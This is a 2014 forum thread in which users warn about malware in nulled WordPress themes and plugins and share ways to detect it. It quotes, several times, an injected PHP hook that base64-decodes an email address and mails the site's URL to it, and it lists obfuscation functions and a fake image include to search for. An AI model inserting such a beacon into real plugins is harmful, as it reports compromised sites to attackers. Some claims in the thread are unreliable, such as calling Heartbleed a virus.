[GET] wplocker.com Malicious code in nulled or Free WordPress Themes and Plugins Warning

***manuel67*** · 06-24-2014, 03:40 PM

thanks for the share. great info. rep added.

***howard4*** · 06-24-2014, 10:38 PM

virustotal is useless.i had ubermenu flat skins plugin installed.Virustotal results were clean.However plugin was infected.

infected plugin has this spam code

addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")

because that code is same with this code:

addressdecode="jaqqscigs@gmail.com";

find that code then replace this entire code

add_action('wp_head','my_wpfunww439');function my_wpfunww439(){if(!username_exists('wordpress')){$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}

Basically it was sending spam mails from my website.My website got blocked by hosting provider because my website caused their server ip adress to be banned.

Lesson learnt but it was too late

***migorengjunkie*** · 06-24-2014, 11:21 PM

Great post, repped and bookmarking this for reference.

***sjc999*** · 06-24-2014, 11:21 PM

Virustotal is designed to find Windows exploits.

(06-24-2014 10:38 PM)thelatinodancer Wrote: virustotal is useless.i had ubermenu flat skins plugin installed.Virustotal results were clean.However plugin was infected.

infected plugin has this spam code

addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")

because that code is same with this code:

addressdecode="jaqqscigs@gmail.com";

find that code then replace this entire code

add_action('wp_head','my_wpfunww439');function my_wpfunww439(){if(!username_exists('wordpress')){$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}

Basically it was sending spam mails from my website.My website got blocked by hosting provider because my website caused their server ip adress to be banned.

Lesson learnt but it was too late

***intrepid*** · 06-24-2014, 11:38 PM

I too was hacked really bad and since then I use Wordfence which is the best security plugin. I also use virustotal on downloaded shares, I use exploit scanner plugin but it doesn't remove base64, eval function and other malicious code it only scans and I've found that code in WP core files, not just in other themes and plugins.

TAC wasn't updated for a while but I see now that they updated it but I use Wordfence. Wordfence was the service that notified me about Heartbleed virus just hours when it was detected and I was able to get the OpenSSL fixed quickly before most people heard about it. :)

***subedei*** · 06-25-2014, 01:22 AM

good to know that. thx

***legionfx*** · 06-25-2014, 01:44 AM

honestly... you guys say that wplocker is bad?! loool have you seen the current state of this forum?! Bunch of users reposting themes from others users, bunch of infected links . Really? Every site is bad, wplocker, this one, everyone. One does not take a payed theme for free and expect a working site. Most users dont even know whats a php file and they come here and there complaining that this and that is infected. Im sorry but im tired like most of the good users in here.

***intrepid*** · 06-25-2014, 02:21 AM

(06-24-2014 10:38 PM)thelatinodancer Wrote: virustotal is useless.i had ubermenu flat skins plugin installed.Virustotal results were clean.However plugin was infected.

infected plugin has this spam code

addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")

because that code is same with this code:

addressdecode="jaqqscigs@gmail.com";

find that code then replace this entire code

add_action('wp_head','my_wpfunww439');function my_wpfunww439(){if(!username_exists('wordpress')){$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}

Basically it was sending spam mails from my website.My website got blocked by hosting provider because my website caused their server ip adress to be banned.

Lesson learnt but it was too late

See post #25. You've got to use Wordfence.

***cipiceuca24*** · 06-25-2014, 02:38 AM

(06-23-2014 02:32 PM)GreenPeace Wrote: Thanks for sharing this about wplocker. I am still a victim of youtube redirect virus in one of my site. Did a strip search of the site but nothing. Still Redirects the site randomly to justin Bieber video!! Man I don't even like Justin Bieber :-|

Search for

Code:

<?php include 'images/social.png' ?>

you may find that piece of code on functions.php or in index.php.
Search for image file social.png Open it with a text editor (like notepad++). If the files starts with <?php, it means that the theme or plugin is infected.
Search for all strings containing base64_decode, gzinflate, gzuncompress or str_rot13 (or all on same string). Use "Find in Files" function of notepad++ to find all encoded strings.
Go to http://ddecode.com/phpdecoder/ and paste the encoded string. Decode it. If you understand php a bit, will also understand that the code is safe or malicious. If you have no clue about php, send me a message with the ddecode.com link. I will try help you out.

Maybe I will open a topic to help you all with this issue.

***disi13*** · (This post was last modified: 06-25-2014 02:51 AM by disi13.)

Example for plugin infected with "social.png"
getnulledscripts .com in "codecanyon-visual-composer-extensions-ihover-v1-2-wordpress-plugin"